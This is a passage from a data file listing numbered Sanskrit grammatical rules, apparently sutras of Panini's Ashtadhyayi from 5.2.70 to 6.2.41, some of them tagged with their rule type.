हारी","5.2.70::तन्त्रादचिरापहृते","5.2.71::ब्राह्मणकोष्णिके संज्ञायाम्","5.2.72::शीतोष्णाभ्यां कारिणि","5.2.73::अधिकम्","5.2.74::अनुकाभिकाभीकः कमिता","5.2.75::पार्श्वेनान्विच्छति","5.2.76::अयःशूलदण्डाजिनाभ्यां ठक्ठञौ","5.2.77::तावतिथं ग्रहणमिति लुग्वा","5.2.78::स एषां ग्रामणीः","5.2.79::शृङ्खलमस्य बन्धनं करभे","5.2.80::उत्क उन्मनाः","5.2.81::कालप्रयोजनाद्रोगे","5.2.82::तदस्मिन्नन्नं प्राये संज्ञायाम्","5.2.83::कुल्माषादञ्","5.2.84::श्रोत्रियंश्छन्दोऽधीते","5.2.85::श्राद्धमनेन भुक्तमिनिठनौ","5.2.86::पूर्वादिनिः","5.2.87::सपूर्वाच्च","5.2.88::इष्टादिभ्यश्च","5.2.89::छन्दसि परिपन्थिपरिपरिणौ पर्यवस्थातरि","5.2.90::अनुपद्यन्वेष्टा","5.2.91::साक्षाद्द्रष्टरि संज्ञायाम्","5.2.92::क्षेत्रियच् परक्षेत्रे चिकित्स्यः","5.2.93::'इन्द्रियमिन्द्रलिंगमिन्द्रदृष्टमिन्द्रसृष्टमिन्द्रजुष्टम्इन्द्रदत्तमिति वा","5.2.94::तदस्यास्त्यस्मिन्निति मतुप्","5.2.95::रसादिभ्यश्च","5.2.96::प्राणिस्थादातो लजन्यतरस्याम्","5.2.97::सिध्मादिभ्यश्च","5.2.98::वत्सांसाभ्यां कामबले","5.2.99::फेनादिलच् च","5.2.100::लोमादिपामादिपिच्छादिभ्यः शनेलचः","5.2.101::प्रज्ञाश्रद्धाऽर्चावृत्तिभ्यो णः","5.2.102::तपःसहस्राभ्यां विनीनी","5.2.103::अण् च","5.2.104::सिकताशर्कराभ्यां च","5.2.105::देशे लुबिलचौ च","5.2.106::दन्त उन्नत उरच्","5.2.107::ऊषसुषिमुष्कमधो रः","5.2.108::द्युद्रुभ्यां मः","5.2.109::केशाद्वोऽन्यतरस्याम्","5.2.110::गाण्ड्यजगात् संज्ञायाम्","5.2.111::काण्डाण्डादीरन्नीरचौ","5.2.112::रजःकृष्यासुतिपरिषदो वलच्","5.2.113::दन्तशिखात् संज्ञायाम्","5.2.114::ज्योत्स्नातमिस्राशृङ्गिणोजस्विन्नूर्जस्वलगोमिन्मलिनमलीमसाः","5.2.115::अत इनिठनौ","5.2.116::व्रीह्यादिभ्यश्च","5.2.117::तुन्दादिभ्य इलच् च","5.2.118::एकगोपूर्वाट्ठञ् नित्यम्","5.2.119::शतसहस्रान्ताच्च निष्कात्","5.2.120::रूपादाहतप्रशंसयोरप्","5.2.121::अस्मायामेधास्रजो विनिः","5.2.122::बहुलं छन्दसि","5.2.123::ऊर्णाया युस्","5.2.124::वाचो ग्मिनिः","5.2.125::आलजाटचौ बहुभाषिणि","5.2.126::स्वामिन्नैश्वर्ये","5.2.127::अर्शआदिभ्योऽच्","5.2.128::द्वंद्वोपतापगर्ह्यात् प्राणिस्थादिनिः","5.2.129::वातातिसाराभ्यां कुक् च","5.2.130::वयसि पूरणात्","5.2.131::सुखादिभ्यश्च","5.2.132::धर्मशीलवर्णान्ताच्च","5.2.133::हस्ताज्जातौ","5.2.134::वर्णाद्ब्रह्मचारिणि","5.2.135::पुष्करादिभ्यो देशे","5.2.136::बलादिभ्यो मतुबन्यतरस्याम्","5.2.137::संज्ञायां मन्माभ्याम्.ह्","5.2.138::कंशंभ्यां बभयुस्तितुतयसः","5.2.139::तुन्दिवलिवटेर्भः","5.2.140::अहंशुभमोर्युस्","5.3.1:संज्ञा:प्राग्दिशो विभक्तिः","5.3.2:अधिकारः:किंसर्वनामबहुभ्योऽद्व्यादिभ्यः","5.3.3::इदम इश्","5.3.4::एतेतौ रथोः","5.3.5::एतदोऽश्","5.3.6::सर्वस्य सोऽन्यतरस्यां दि","5.3.7::पञ्चम्यास्तसिल्","5.3.8::तसेश्च","5.3.9::पर्यभिभ्यां च","5.3.10::सप्तम्यास्त्रल्","5.3.11::इदमो हः","5.3.12::किमोऽत्","5.3.13::वा ह च च्छन्दसि","5.3.14::इतराभ्योऽपि दृश्यन्ते","5.3.15::सर्वैकान्यकिंयत्तदः काले दा","5.3.16::इदमो र्हिल्","5.3.17::अधुना","5.3.18::दानीं च","5.3.19::तदो दा च","5.3.20::तयोर्दार्हिलौ च च्छन्दसि","5.3.21::अनद्यतने 
र्हिलन्यतरस्याम्","5.3.22::सद्यःपरुत्परार्यैषमःपरेद्यव्यद्यपूर्वेद्युरन्येद्युरन्यतरेद्युरितरेद्युरपरेद्युरधरेद्युरुभयेद्युरुत्तरेद्युः","5.3.23::प्रकारवचने थाल्","5.3.24::इदमस्थमुः","5.3.25::किमश्च","5.3.26::था हेतौ च च्छन्दसि","5.3.27::दिक्शब्देभ्यः सप्तमीपञ्चमीप्रथमाभ्यो दिग्देशकालेष्वस्तातिः","5.3.28::दक्षिणोत्तराभ्यामतसुच्","5.3.29::विभाषा परावराभ्याम्","5.3.30::अञ्चेर्लुक्","5.3.31::उपर्युपरिष्टात्","5.3.32::पश्चात्","5.3.33::पश्च पश्चा च च्छन्दसि","5.3.34::उत्तराधरदक्षिणादातिः","5.3.35::एनबन्यतरस्यामदूरेऽपञ्चम्याः","5.3.36::दक्षिणादाच्","5.3.37::आहि च दूरे","5.3.38::उत्तराच्च","5.3.39::पूर्वाधरावराणामसि पुरधवश्चैषाम्","5.3.40::अस्ताति च","5.3.41::विभाषाऽवरस्य","5.3.42::संख्याया विधाऽर्थे धा","5.3.43::अधिकरणविचाले च","5.3.44::एकाद्धो ध्यमुञन्यतरस्याम्","5.3.45::द्वित्र्योश्च धमुञ्","5.3.46::एधाच्च","5.3.47::याप्ये पाशप्","5.3.48::पूरणाद्भागे तीयादन्","5.3.49::प्रागेकादशभ्योऽच्छन्दसि","5.3.50::षष्ठाष्टमाभ्यां ञ च","5.3.51::मानपश्वङ्गयोः कन्लुकौ च","5.3.52::एकादाकिनिच्चासहाये","5.3.53::भूतपूर्वे चरट्","5.3.54::षष्ठ्या रूप्य च","5.3.55::अतिशायने तमबिष्ठनौ","5.3.56::तिङश्च","5.3.57::द्विवचनविभज्योपपदे तरबीयसुनौ","5.3.58::अजादी गुणवचनादेव","5.3.59::तुश्छन्दसि","5.3.60::प्रशस्यस्य श्रः","5.3.61::ज्य च","5.3.62::वृद्धस्य च","5.3.63::अन्तिकबाढयोर्नेदसाधौ","5.3.64::युवाल्पयोः कनन्यतरस्याम्","5.3.65::विन्मतोर्लुक्","5.3.66::प्रशंसायां रूपप्","5.3.67::ईषदसमाप्तौ कल्पब्देश्यदेशीयरः","5.3.68::विभाषा सुपो बहुच् पुरस्तात्तु","5.3.69::प्रकारवचने जातीयर्","5.3.70:अधिकारः:प्रागिवात्कः","5.3.71::अव्ययसर्वनाम्नामकच् प्राक् टेः","5.3.72::कस्य च दः","5.3.73::अज्ञाते","5.3.74::कुत्सिते","5.3.75::संज्ञायां कन्","5.3.76::अनुकम्पायाम्","5.3.77::नीतौ च तद्युक्तात्","5.3.78::बह्वचो मनुष्यनाम्नष्ठज्वा","5.3.79::घनिलचौ च","5.3.80::प्राचामुपादेरडज्वुचौ च","5.3.81::जातिनाम्नः कन्","5.3.82::अजिनान्तस्योत्तरपदलोपश्च","5.3.83::ठाजादावूर्ध्वं द्वितीयादचः","5.3.84::शेवलसुपरिविशालवरुणार्यमादीनां तृतीयात्","5.3.85::अल्पे","5.3.86::ह्रस्वे","5.3.87::संज्ञायां कन्","5.3.88::कुटीशमीशुण्डाभ्यो रः","5.3.89::कुत्वा डुपच्","5.3.90::कासूगोणीभ्यां ष्टरच्","5.3.91::वत्सोक्षाश्वर्षभेभ्यश्च तनुत्वे","5.3.92::किंयत्तदो निर्द्धारणे द्वयोरेकस्य डतरच्","5.3.93::वा बहूनां जातिपरिप्रश्ने डतमच्","5.3.94::एकाच्च प्राचाम्","5.3.95::अवक्षेपणे कन्","5.3.96::इवे प्रतिकृतौ","5.3.97::संज्ञायां च","5.3.98::लुम्मनुष्ये","5.3.99::जीविकाऽर्थे चापण्ये","5.3.100::देवपथादिभ्यश्च","5.3.101::वस्तेर्ढञ्","5.3.102::शिलाया ढः","5.3.103::शाखाऽऽदिभ्यो यत्","5.3.104::द्रव्यं च भव्ये","5.3.105::कुशाग्राच्छः","5.3.106::समासाच्च तद्विषयात्","5.3.107::शर्कराऽऽदिभ्योऽण्","5.3.108::अङ्गुल्यादिभ्यष्ठक्","5.3.109::एकशालायाष्ठजन्यतरस्याम्","5.3.110::कर्कलोहितादीकक्","5.3.111::प्रत्नपूर्वविश्वेमात्थाल् छन्दसि","5.3.112::पूगाञ्ञ्योऽग्रामणीपूर्वात्","5.3.113::व्रातच्फञोरस्त्रियाम्","5.3.114::आयुधजीविसंघाञ्ञ्यड्वाहीकेष्वब्राह्मणराजन्यात्","5.3.115::वृकाट्टेण्यण्","5.3.116::दामन्यादित्रिगर्तषष्ठाच्छः","5.3.117::पर्श्वादियौधेयादिभ्यामणञौ","5.3.118::अभिजिद्विदभृच्छालावच्छिखावच्छमीवदूर्णावच्छ्रुमदणो यञ्","5.3.119:संज्ञा:ञ्यादयस्तद्राजाः","5.4.1::पादशतस्य संख्याऽऽदेर्वीप्सायां वुन् लोपश्च","5.4.2::दण्डव्यवसर्गयोश्च","5.4.3::स्थूलादिभ्यः प्रकारवचने कन्","5.4.4::अनत्यन्तगतौ क्तात्","5.4.5::न सामिवचने","5.4.6::बृहत्या आच्छादने","5.4.7::अषडक्षाशितङ्ग्वलंकर्मालम्पुरुषाध्युत्तरपदात् खः","5.4.8::विभाषा अञ्चेरदिक्स्त्रियाम्","5.4.9::जात्यन्ताच्छ बन्धुनि","5.4.10::स्थानान्ताद्विभाषा सस्थानेनेति चेत्","5.4.11::किमेत्तिङव्ययघादाम्वद्रव्यप्रकर्षे","5.4.12::अमु च च्छन्दसि","5.4.13::अनुगादिनष्ठक्","5.4.14::णचः स्त्रियामञ्","5.4.15::अणिनुणः","5.4.16::विसारिणो मत्स्ये","5.4.17::संख्यायाः 
क्रियाऽभ्यावृत्तिगणने कृत्वसुच्","5.4.18::द्वित्रिचतुर्भ्यः सुच्","5.4.19::एकस्य सकृच्च","5.4.20::विभाषा बहोर्धाऽविप्रकृष्टकाले","5.4.21::तत्प्रकृतवचने मयट्","5.4.22:अतिदेशः:समूहवच्च बहुषु","5.4.23::अनन्तावसथेतिहभेषजाञ्ञ्यः","5.4.24::देवतान्तात्तादर्थ्ये यत्","5.4.25::पादार्घाभ्यां च","5.4.26::अतिथेर्ञ्यः","5.4.27::देवात्तल्","5.4.28::अवेः कः","5.4.29::यावादिभ्यः कन्","5.4.30::लोहितान्मणौ","5.4.31::वर्णे चानित्ये","5.4.32::रक्ते","5.4.33::कालाच्च","5.4.34::विनयादिभ्यष्ठक्","5.4.35::वाचो व्याहृतार्थायाम्","5.4.36::तद्युक्तात् कर्मणोऽण्","5.4.37::ओषधेरजातौ","5.4.38::प्रज्ञादिभ्यश्च","5.4.39::मृदस्तिकन्","5.4.40::सस्नौ प्रशंसायाम्","5.4.41::वृकज्येष्ठाभ्यां तिल्तातिलौ च च्छन्दसि","5.4.42::बह्वल्पार्थाच्छस् कारकादन्यतरस्याम्","5.4.43::संख्यैकवचनाच्च वीप्सायाम्","5.4.44::प्रतियोगे पञ्चम्यास्तसिः","5.4.45::अपादाने चाहीयरुहोः","5.4.46::अतिग्रहाव्यथनक्षेपेष्वकर्तरि तृतीयायाः","5.4.47::हीयमानपापयोगाच्च","5.4.48::षष्ठ्या व्याश्रये","5.4.49::रोगाच्चापनयने","5.4.50::अभूततद्भावे कृभ्वस्तियोगे सम्पद्यकर्तरि च्विः","5.4.51::अरुर्मनश्चक्षुश्चेतोरहोरजसां लोपश्च","5.4.52::विभाषा साति कार्त्स्न्ये","5.4.53::अभिविधौ सम्पदा च","5.4.54::तदधीनवचने","5.4.55::देये त्रा च","5.4.56::देवमनुष्यपुरुषमर्त्येभ्यो द्वितीयासप्तम्योर्बहुलम्","5.4.57::अव्यक्तानुकरणाद्द्व्यजवरार्धादनितौ डाच्","5.4.58::कृञो द्वितीयतृतीयशम्बबीजात् कृषौ","5.4.59::संख्यायाश्च गुणान्तायाः","5.4.60::समयाच्च यापनायाम्","5.4.61::सपत्त्रनिष्पत्रादतिव्यथने","5.4.62::निष्कुलान्निष्कोषणे","5.4.63::सुखप्रियादानुलोम्ये","5.4.64::दुःखात् प्रातिलोम्ये","5.4.65::शूलात् पाके","5.4.66::सत्यादशपथे","5.4.67::मद्रात् परिवापणे","5.4.68:अधिकारः:समासान्ताः","5.4.69::न पूजनात्","5.4.70::किमः क्षेपे","5.4.71::नञस्तत्पुरुषात्","5.4.72::पथो विभाषा","5.4.73::बहुव्रीहौ संख्येये डजबहुगणात्","5.4.74::ऋक्पूरप्धूःपथामानक्षे","5.4.75::अच् प्रत्यन्ववपूर्वात् सामलोम्नः","5.4.76::अक्ष्णोऽदर्शनात्","5.4.77::अचतुरविचतुरसुचतुरस्त्रीपुंसधेन्वनडुहर्क्सामवाङ्मनसाक्षिभ्रुवदारगवोर्वष्ठीवपदष्ठीवनक्तंदिवरत्रिंदिवाहर्दिवसरजसनिःश्रेयसपुरुषायुषद्व्यायुषत्र्यायुषर्ग्यजुषजातोक्षमहोक्षवृद्धोक्षोपशुनगोष्ठश्वाः","5.4.78::ब्रह्महस्तिभ्याम् वर्च्चसः","5.4.79::अवसमन्धेभ्यस्तमसः","5.4.80::श्वसो वसीयःश्रेयसः","5.4.81::अन्ववतप्ताद्रहसः","5.4.82::प्रतेरुरसः सप्तमीस्थात्","5.4.83::अनुगवमायामे","5.4.84::द्विस्तावा त्रिस्तावा वेदिः","5.4.85::उपसर्गादध्वनः","5.4.86::तत्पुरुषस्याङ्गुलेः संख्याऽव्ययादेः","5.4.87::अहस्सर्वैकदेशसंख्यातपुण्याच्च रात्रेः","5.4.88::अह्नोऽह्न एतेभ्यः","5.4.89::न संख्याऽऽदेः समाहारे","5.4.90::उत्तमैकाभ्यां च","5.4.91::राजाऽहस्सखिभ्यष्टच्","5.4.92::गोरतद्धितलुकि","5.4.93::अग्राख्यायामुरसः","5.4.94::अनोऽश्मायस्सरसाम् जातिसंज्ञयोः","5.4.95::ग्रामकौटाभ्यां च तक्ष्णः","5.4.96::अतेः शुनः","5.4.97::उपमानादप्राणिषु","5.4.98::उत्तरमृगपूर्वाच्च सक्थ्नः","5.4.99::नावो द्विगोः","5.4.100::अर्धाच्च","5.4.101::खार्याः प्राचाम्","5.4.102::द्वित्रिभ्यामञ्जलेः","5.4.103::अनसन्तान्नपुंसकाच्छन्दसि","5.4.104::ब्रह्मणो जानपदाख्यायाम्","5.4.105::कुमहद्भ्यामन्यतरस्याम्","5.4.106::द्वंद्वाच्चुदषहान्तात् समाहारे","5.4.107::अव्ययीभावे शरत्प्रभृतिभ्यः","5.4.108::अनश्च","5.4.109::नपुंसकादन्यतरस्याम्","5.4.110::नदीपौर्णमास्याग्रहायणीभ्यः","5.4.111::झयः","5.4.112::गिरेश्च सेनकस्य","5.4.113::बहुव्रीहौ सक्थ्यक्ष्णोः स्वाङ्गात् षच्","5.4.114::अङ्गुलेर्दारुणि","5.4.115::द्वित्रिभ्यां ष मूर्ध्नः","5.4.116::अप् पूरणीप्रमाण्योः","5.4.117::अन्तर्बहिर्भ्यां च लोम्नः","5.4.118::अञ्नासिकायाः संज्ञायां नसं चास्थूलात्","5.4.119::उपसर्गाच्च","5.4.120::सुप्रातसुश्वसुदिवशारिकुक्षचतुरश्रैणीपदाजपदप्रोष्ठपदाः","5.4.121::नञ्दुःसुभ्यो हलिसक्थ्योरन्यतरस्याम्","5.4.122::नित्यमसिच् 
प्रजामेधयोः","5.4.123::बहुप्रजाश्छन्दसि","5.4.124::धर्मादनिच् केवलात्","5.4.125::जम्भा सुहरिततृणसोमेभ्यः","5.4.126::दक्षिणेर्मा लुब्धयोगे","5.4.127::इच् कर्मव्यतिहारे","5.4.128::द्विदण्ड्यादिभ्यश्च","5.4.129::प्रसम्भ्यां जानुनोर्ज्ञुः","5.4.130::ऊर्ध्वाद्विभाषा","5.4.131::ऊधसोऽनङ्","5.4.132::धनुषश्च","5.4.133::वा संज्ञायाम्","5.4.134::जायाया निङ्","5.4.135::गन्धस्येदुत्पूतिसुसुरभिभ्यः","5.4.136::अल्पाख्यायाम्","5.4.137::उपमानाच्च","5.4.138::पादस्य लोपोऽहस्त्यादिभ्यः","5.4.139::कुम्भपदीषु च","5.4.140::संख्यासुपूर्वस्य","5.4.141::वयसि दन्तस्य दतृ","5.4.142::छन्दसि च","5.4.143::स्त्रियां संज्ञायाम्","5.4.144::विभाषा श्यावारोकाभ्याम्","5.4.145::अग्रान्तशुद्धशुभ्रवृषवराहेभ्यश्च","5.4.146::ककुदस्यावस्थायां लोपः","5.4.147::त्रिककुत् पर्वते","5.4.148::उद्विभ्यां काकुदस्य","5.4.149::पूर्णाद्विभाषा","5.4.150::सुहृद्दुर्हृदौ मित्रामित्रयोः","5.4.151::उरःप्रभृतिभ्यः कप्","5.4.152::इनः स्त्रियाम्","5.4.153::नद्यृतश्च","5.4.154::शेषाद्विभाषा","5.4.155::न संज्ञायाम्","5.4.156::ईयसश्च","5.4.157::वन्दिते भ्रातुः","5.4.158::ऋतश्छन्दसि","5.4.159::नाडीतन्त्र्योः स्वाङ्गे","5.4.160::निष्प्रवाणिश्च","6.1.1::एकाचो द्वे प्रथमस्य","6.1.2::अजादेर्द्वितीयस्य","6.1.3::न न्द्राः संयोगादयः","6.1.4:संज्ञा:पूर्वोऽभ्यासः","6.1.5:संज्ञा:उभे अभ्यस्तम्","6.1.6::जक्षित्यादयः षट्","6.1.7::तुजादीनां दीर्घोऽभ्यासस्य","6.1.8::लिटि धातोरनभ्यासस्य","6.1.9::सन्यङोः","6.1.10::श्लौ","6.1.11::चङि","6.1.12::दाश्वान् साह्वान् मीढ्वांश्च","6.1.13::ष्यङः सम्प्रसारणं पुत्रपत्योस्तत्पुरुषे","6.1.14::बन्धुनि बहुव्रीहौ","6.1.15::वचिस्वपियजादीनां किति","6.1.16::ग्रहिज्यावयिव्यधिवष्टिविचतिवृश्चतिपृच्छतिभृज्जतीनां ङिति च","6.1.17::लिट्यभ्यासस्योभयेषाम्","6.1.18::स्वापेश्चङि","6.1.19::स्वपिस्यमिव्येञां यङि","6.1.20::न वशः","6.1.21::चायः की","6.1.22::स्फायः स्फी निष्ठायाम्","6.1.23::स्त्यः प्रपूर्वस्य","6.1.24::द्रवमूर्तिस्पर्शयोः श्यः","6.1.25::प्रतेश्च","6.1.26::विभाषाऽभ्यवपूर्वस्य","6.1.27::शृतं पाके","6.1.28::प्यायः पी","6.1.29::लिड्यङोश्च","6.1.30::विभाषा श्वेः","6.1.31::णौ च संश्चङोः","6.1.32::ह्वः सम्प्रसारणम्","6.1.33::अभ्यस्तस्य च","6.1.34::बहुलं छन्दसि","6.1.35::चायः की","6.1.36::अपस्पृधेथामानृचुरानृहुश्चिच्युषेतित्याजश्राताःश्रितमाशीराशीर्त्तः","6.1.37::न सम्प्रसारणे सम्प्रसारणम्","6.1.38::लिटि वयो यः","6.1.39::वश्चास्यान्यतरस्याम् किति","6.1.40::वेञः","6.1.41::ल्यपि च","6.1.42::ज्यश्च","6.1.43::व्यश्च","6.1.44::विभाषा परेः","6.1.45::आदेच उपदेशेऽशिति","6.1.46::न व्यो लिटि","6.1.47::स्फुरतिस्फुलत्योर्घञि","6.1.48::क्रीङ्जीनां णौ","6.1.49::सिध्यतेरपारलौकिके","6.1.50::मीनातिमिनोतिदीङां ल्यपि च","6.1.51::विभाषा लीयतेः","6.1.52::खिदेश्छन्दसि","6.1.53::अपगुरो णमुलि","6.1.54::चिस्फुरोर्णौ","6.1.55::प्रजने वीयतेः","6.1.56::बिभेतेर्हेतुभये","6.1.57::नित्यं स्मयतेः","6.1.58::सृजिदृशोर्झल्यमकिति","6.1.59::अनुदात्तस्य चर्दुपधस्यान्यतरस्याम्","6.1.60::शीर्षंश्छन्दसि","6.1.61::ये च तद्धिते","6.1.62::अचि शीर्षः","6.1.63::पद्दन्नोमास्हृन्निशसन्यूषन्दोषन्यकञ्छकन्नुदन्नासञ्छस्प्रभृतिषु","6.1.64::धात्वादेः षः सः","6.1.65::णो नः","6.1.66::लोपो व्योर्वलि","6.1.67::वेरपृक्तस्य","6.1.68::हल्ङ्याब्भ्यो दीर्घात् सुतिस्यपृक्तं हल्","6.1.69::एङ्ह्रस्वात् सम्बुद्धेः","6.1.70::शेश्छन्दसि बहुलम्","6.1.71:अधिकारः:ह्रस्वस्य पिति कृति तुक्","6.1.72::संहितायाम्","6.1.73::छे च","6.1.74::आङ्माङोश्च","6.1.75::दीर्घात्","6.1.76::पदान्ताद्वा","6.1.77::इको यणचि","6.1.78::एचोऽयवायावः","6.1.79::वान्तो यि प्रत्यये","6.1.80::धातोस्तन्निमित्तस्यैव","6.1.81::क्षय्यजय्यौ शक्यार्थे","6.1.82::क्रय्यस्तदर्थे","6.1.83:अधिकारः:भय्यप्रवय्ये च च्छन्दसि","6.1.84::एकः 
पूर्वपरयोः","6.1.85:अतिदेशः:अन्तादिवच्च","6.1.86:अतिदेशः:षत्वतुकोरसिद्धः","6.1.87::आद्गुणः","6.1.88::वृद्धिरेचि","6.1.89::एत्येधत्यूठ्सु","6.1.90::आटश्च","6.1.91::उपसर्गादृति धातौ","6.1.92::वा सुप्यापिशलेः","6.1.93::औतोऽम्शसोः","6.1.94::एङि पररूपम्","6.1.95::ओमाङोश्च","6.1.96::उस्यपदान्तात्","6.1.97::अतो गुणे","6.1.98::अव्यक्तानुकरणस्यात इतौ","6.1.99::नाम्रेडितस्यान्त्यस्य तु वा","6.1.100::नित्यमाम्रेडिते डाचि","6.1.101::अकः सवर्णे दीर्घः","6.1.102::प्रथमयोः पूर्वसवर्णः","6.1.103::तस्माच्छसो नः पुंसि","6.1.104::नादिचि","6.1.105::दीर्घाज्जसि च","6.1.106::वा छन्दसि","6.1.107::अमि पूर्वः","6.1.108::सम्प्रसारणाच्च","6.1.109::एङः पदान्तादति","6.1.110::ङसिङसोश्च","6.1.111::ऋत उत्","6.1.112::ख्यत्यात् परस्य","6.1.113::अतो रोरप्लुतादप्लुते","6.1.114::हशि च","6.1.115::प्रकृत्याऽन्तःपादमव्यपरे","6.1.116::अव्यादवद्यादवक्रमुरव्रतायमवन्त्ववस्युषु च","6.1.117::यजुष्युरः","6.1.118::आपोजुषाणोवृष्णोवर्षिष्ठेऽम्बेऽम्बालेऽम्बिकेपूर्वे","6.1.119::अङ्ग इत्यादौ च","6.1.120::अनुदात्ते च कुधपरे","6.1.121::अवपथासि च","6.1.122::सर्वत्र विभाषा गोः","6.1.123::अवङ् स्फोटायनस्य","6.1.124::इन्द्रे च {नित्यम्}","6.1.125::प्लुतप्रगृह्या अचि नित्यम्","6.1.126::आङोऽनुनासिकश्छन्दसि","6.1.127::इकोऽसवर्णे शाकल्यस्य ह्रस्वश्च","6.1.128::ऋत्यकः","6.1.129:अतिदेशः:अप्लुतवदुपस्थिते","6.1.130::ई३ चाक्रवर्मणस्य","6.1.131::दिव उत्","6.1.132::एतत्तदोः सुलोपोऽकोरनञ्समासे हलि","6.1.133:अधिकारः:स्यश्छन्दसि बहुलम्","6.1.134::सोऽचि लोपे चेत् पादपूरणम्","6.1.135::सुट् कात् पूर्वः","6.1.136::अडभ्यासव्यवायेऽपि","6.1.137::सम्पर्युपेभ्यः करोतौ भूषणे","6.1.138::समवाये च","6.1.139::उपात् प्रतियत्नवैकृतवाक्याध्याहारेषु","6.1.140::किरतौ लवने","6.1.141::हिंसायां प्रतेश्च","6.1.142::अपाच्चतुष्पाच्छकुनिष्वालेखने","6.1.143::कुस्तुम्बुरूणि जातिः","6.1.144::अपरस्पराः क्रियासातत्ये","6.1.145::गोष्पदं सेवितासेवितप्रमाणेषु","6.1.146::आस्पदं प्रतिष्ठायाम्","6.1.147::आश्चर्यमनित्ये","6.1.148::वर्चस्केऽवस्करः","6.1.149::अपस्करो रथाङ्गम्","6.1.150::विष्किरः शकुनिर्विकरो वा","6.1.151::ह्रस्वाच्चन्द्रोत्तरपदे मन्त्रे","6.1.152::प्रतिष्कशश्च कशेः","6.1.153::प्रस्कण्वहरिश्चन्द्रावृषी","6.1.154::मस्करमस्करिणौ वेणुपरिव्राजकयोः","6.1.155::कास्तीराजस्तुन्दे नगरे","6.1.156::कारस्करो वृक्षः","6.1.157::पारस्करप्रभृतीनि च संज्ञायाम्","6.1.158:परिभाषा:अनुदात्तं पदमेकवर्जम्","6.1.159::कर्षात्वतो घञोऽन्त उदात्तः","6.1.160::उञ्छादीनां च","6.1.161::अनुदात्तस्य च यत्रोदात्तलोपः","6.1.162::धातोः","6.1.163::चितः","6.1.164::तद्धितस्य","6.1.165::कितः","6.1.166::तिसृभ्यो जसः","6.1.167::चतुरः शसि","6.1.168::सावेकाचस्तृतीयाऽऽदिविभक्तिः","6.1.169::अन्तोदत्तादुत्तरपदादन्यतरस्यामनित्यसमासे","6.1.170::अञ्चेश्छन्दस्यसर्वनामस्थानम्","6.1.171::ऊडिदम्पदाद्यप्पुम्रैद्युभ्यः","6.1.172::अष्टनो दीर्घात्","6.1.173::शतुरनुमो नद्यजादी","6.1.174::उदात्तयणो हल्पूर्वात्","6.1.175::नोङ्धात्वोः","6.1.176::ह्रस्वनुड्भ्यां मतुप्","6.1.177::नामन्यतरस्याम्","6.1.178::ङ्याश्छन्दसि बहुलम्","6.1.179::षट्त्रिचतुर्भ्यो हलादिः","6.1.180::झल्युपोत्तमम्","6.1.181::विभाषा भाषायाम्","6.1.182::न गोश्वन्त्साववर्णराडङ्क्रुङ्कृद्भ्यः","6.1.183::दिवो झल्","6.1.184::नृ चान्यतरस्याम्","6.1.185::तित्स्वरितम्","6.1.186::तास्यनुदात्तेन्ङिददुपदेशाल्लसार्वधातुकमनुदात्तमहन्विङोः","6.1.187::आदिः सिचोऽन्यतरस्याम्","6.1.188::स्वपादिर्हिंसामच्यनिटि","6.1.189::अभ्यस्तानामादिः","6.1.190::अनुदात्ते च","6.1.191::सर्वस्य सुपि","6.1.192::भीह्रीभृहुमदजनधनदरिद्राजागरां प्रत्ययात् पूर्वम् पिति","6.1.193::लिति","6.1.194::आदिर्णमुल्यन्यतरस्याम्","6.1.195::अचः कर्तृयकि","6.1.196::थलि च सेटीडन्तो वा","6.1.197::ञ्णित्यादिर्नित्यम्","6.1.198::आमन्त्रितस्य च","6.1.199::पथिमथोः सर्वनामस्थाने","6.1.200::अन्तश्च तवै युगपत्","6.1.201::क्षयो 
निवासे","6.1.202::जयः करणम्","6.1.203::वृषादीनां च","6.1.204::संज्ञायामुपमानम्","6.1.205::निष्ठा च द्व्यजनात्","6.1.206::शुष्कधृष्टौ","6.1.207::आशितः कर्ता","6.1.208::रिक्ते विभाषा","6.1.209::जुष्टार्पिते च छन्दसि","6.1.210::नित्यं मन्त्रे","6.1.211::युष्मदस्मदोर्ङसि","6.1.212::ङयि च","6.1.213::यतोऽनावः","6.1.214::ईडवन्दवृशंसदुहां ण्यतः","6.1.215::विभाषा वेण्विन्धानयोः","6.1.216::त्यागरागहासकुहश्वठक्रथानाम्","6.1.217::उपोत्तमं रिति","6.1.218::चङ्यन्यतरस्याम्","6.1.219::मतोः पूर्वमात् संज्ञायां स्त्रियाम्","6.1.220::अन्तोऽवत्याः","6.1.221::ईवत्याः","6.1.222::चौ","6.1.223::समासस्य","6.2.1::बहुव्रीहौ प्रकृत्या पूर्वपदम्","6.2.2::तत्पुरुषे तुल्यार्थतृतीयासप्तम्युपमानाव्ययद्वितीयाकृत्याः","6.2.3::वर्णः वर्णेष्वनेते","6.2.4::गाधलवणयोः प्रमाणे","6.2.5::दायाद्यं दायादे","6.2.6::प्रतिबन्धि चिरकृच्छ्रयोः","6.2.7::पदेऽपदेशे","6.2.8::निवाते वातत्राणे","6.2.9::शारदेअनार्तवे","6.2.10::अध्वर्युकषाययोर्जातौ","6.2.11::सदृशप्रतिरूपयोः सादृश्ये","6.2.12::द्विगौ प्रमाणे","6.2.13::गन्तव्यपण्यं वाणिजे","6.2.14::मात्रोपज्ञोपक्रमच्छाये नपुंसके","6.2.15::सुखप्रिययोर्हिते","6.2.16::प्रीतौ च","6.2.17::स्वं स्वामिनि","6.2.18::पत्यावैश्वर्ये","6.2.19::न भूवाक्चिद्दिधिषु","6.2.20::वा भुवनम्","6.2.21::आशङ्काबाधनेदीयस्सु संभावने","6.2.22::पूर्वे भूतपूर्वे","6.2.23::सविधसनीडसमर्यादसवेशसदेशेषु सामीप्ये","6.2.24::विस्पष्टादीनि गुणवचनेषु","6.2.25::श्रज्याऽवमकन्पापवत्सु भावे कर्मधारये","6.2.26::कुमारश्च","6.2.27::आदिः प्रत्येनसि","6.2.28::पूगेष्वन्यतरस्याम्","6.2.29::इगन्तकालकपालभगालशरावेषु द्विगौ","6.2.30::बह्वन्यतरस्याम्","6.2.31::दिष्टिवितस्त्योश्च","6.2.32::सप्तमी सिद्धशुष्कपक्वबन्धेष्वकालात्","6.2.33::परिप्रत्युपापा वर्ज्यमानाहोरात्रावयवेषु","6.2.34::राजन्यबहुवचनद्वंद्वेऽन्धकवृष्णिषु","6.2.35::संख्या","6.2.36::आचार्योपसर्जनश्चान्तेवासी","6.2.37::कार्तकौजपादयश्च","6.2.38::महान् व्रीह्यपराह्णगृष्टीष्वासजाबालभारभारतहैलिहिलरौरवप्रवृद्धेषु","6.2.39::क्षुल्लकश्च वैश्वदेवे","6.2.40::उष्ट्रः सादिवाम्योः","6.2.41::गौः 